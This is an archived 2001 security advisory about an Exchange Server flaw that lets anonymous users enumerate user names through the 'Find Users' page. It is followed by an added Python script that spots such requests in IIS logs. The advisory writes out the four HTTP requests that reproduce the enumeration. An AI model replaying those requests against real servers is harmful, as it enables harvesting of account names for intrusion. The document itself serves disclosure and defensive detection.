The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

SUMMARY

Microsoft Exchange Server handles anonymous access to its Public Folders insecurely. While administrators may disable the "Find Users" feature to prevent anonymous users from enumerating existing user names, a security flaw in Exchange Server allows remote attackers with access to the Exchange server to run "Find Users" anyway.

DETAILS

Microsoft Exchange's Public Folders option "Find Users" can be disabled. This, however, does not prevent users from directly accessing the ASP page (fumsg.asp). Disabling the option only hides the link to "Find Users"; the page itself remains reachable programmatically.

Steps to recreate:

1) Contact:

   GET /exchange/root.asp?acs=anon HTTP/1.1
   Host: www.example.com

2) Access the redirected page, and resend the issued cookie.

   GET /exchange/logonfrm.asp HTTP/1.1
   Host: www.example.com
   Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

3) Access the redirected page, and resend the issued cookie.

   GET /exchange/root.asp?acs=anon HTTP/1.1
   Host: www.example.com
   Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

4) Issue this request to obtain a list of users with the letter 'a' in their name (e.g. Administrator):

   POST /exchange/finduser/fumsg.asp HTTP/1.1
   Host: www.example.com
   Accept: */*
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 44
   Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

   DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

Vendor status:
Microsoft was contacted on August 4, 2001. A security bulletin was released on September 7, 2001.

Solution:
Microsoft has released a patch for this problem. See Microsoft Security Bulletin MS01-047 for more information:
<http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-047.asp>

ADDITIONAL INFORMATION

This security hole was discovered by <mailto:noamrat_private> Noam Rathaus.
The information has been provided by <mailto:expertsat_private> SecuriTeam Experts.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
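The advisory's point is that hiding the "Find Users" link does not stop requests to fumsg.asp, so until MS01-047 is applied the only server-side evidence of enumeration is in the web logs. The following is an added example, not part of the SecuriTeam advisory or of any Microsoft code: it parses IIS W3C extended log lines and flags requests to /exchange/finduser/fumsg.asp that carry no authenticated user name (cs-username is "-"), which is the anonymous session path the advisory describes. The field list, the log lines, the client addresses and the user name are constructed for the example; real IIS logs may log different fields, so the parser reads the "#Fields:" header rather than assuming column positions.

```python
"""Flag anonymous requests to the Exchange 'Find Users' page in IIS W3C logs.

Added example for the MS01-047 advisory; sample data below is constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Constructed sample in the IIS W3C extended log format (not a real capture).
# The third and fifth data lines are anonymous hits on fumsg.asp; the fourth
# is an authenticated OWA user doing a normal lookup.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-username cs-method cs-uri-stem cs-uri-query sc-status
2001-09-07 08:10:01 203.0.113.7 - GET /exchange/root.asp acs=anon 302
2001-09-07 08:10:02 203.0.113.7 - GET /exchange/logonfrm.asp - 302
2001-09-07 08:10:04 203.0.113.7 - POST /exchange/finduser/fumsg.asp - 200
2001-09-07 08:12:30 198.51.100.9 CORP\\jdoe POST /exchange/finduser/fumsg.asp - 200
2001-09-07 08:13:00 203.0.113.7 - GET /exchange/finduser/fumsg.asp - 200
"""

# Page named in the advisory; matched case-insensitively because IIS paths are.
FINDUSER_PAGE = "/exchange/finduser/fumsg.asp"


@dataclass
class Hit:
    timestamp: str
    client: str
    method: str
    status: str


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # header may be repeated mid-file on rotation
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line seen before any #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def anonymous_finduser_hits(text: str) -> List[Hit]:
    """Return requests to fumsg.asp made without an authenticated user name."""
    hits: List[Hit] = []
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"].lower() != FINDUSER_PAGE:
            continue
        if rec["cs-username"] != "-":
            continue  # authenticated user: ordinary OWA usage, not the anonymous path
        hits.append(Hit(f'{rec["date"]} {rec["time"]}', rec["c-ip"],
                        rec["cs-method"], rec["sc-status"]))
    return hits


def hits_by_client(hits: List[Hit]) -> Dict[str, int]:
    """Count anonymous fumsg.asp requests per source address."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.client] = counts.get(h.client, 0) + 1
    return counts


if __name__ == "__main__":
    found = anonymous_finduser_hits(SAMPLE_LOG)
    for h in found:
        print(f"{h.timestamp} {h.client} {h.method} fumsg.asp -> {h.status}")
    print("per client:", hits_by_client(found))
```

A patched server should answer these anonymous requests with an error rather than 200, so the status column is kept in each hit: a run of 200s from an unauthenticated client after the patch date is the case worth investigating, while 4xx responses indicate the fix is in place.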
This archive was generated by hypermail 2b30 : Fri Sep 07 2001 - 08:53:07 PDT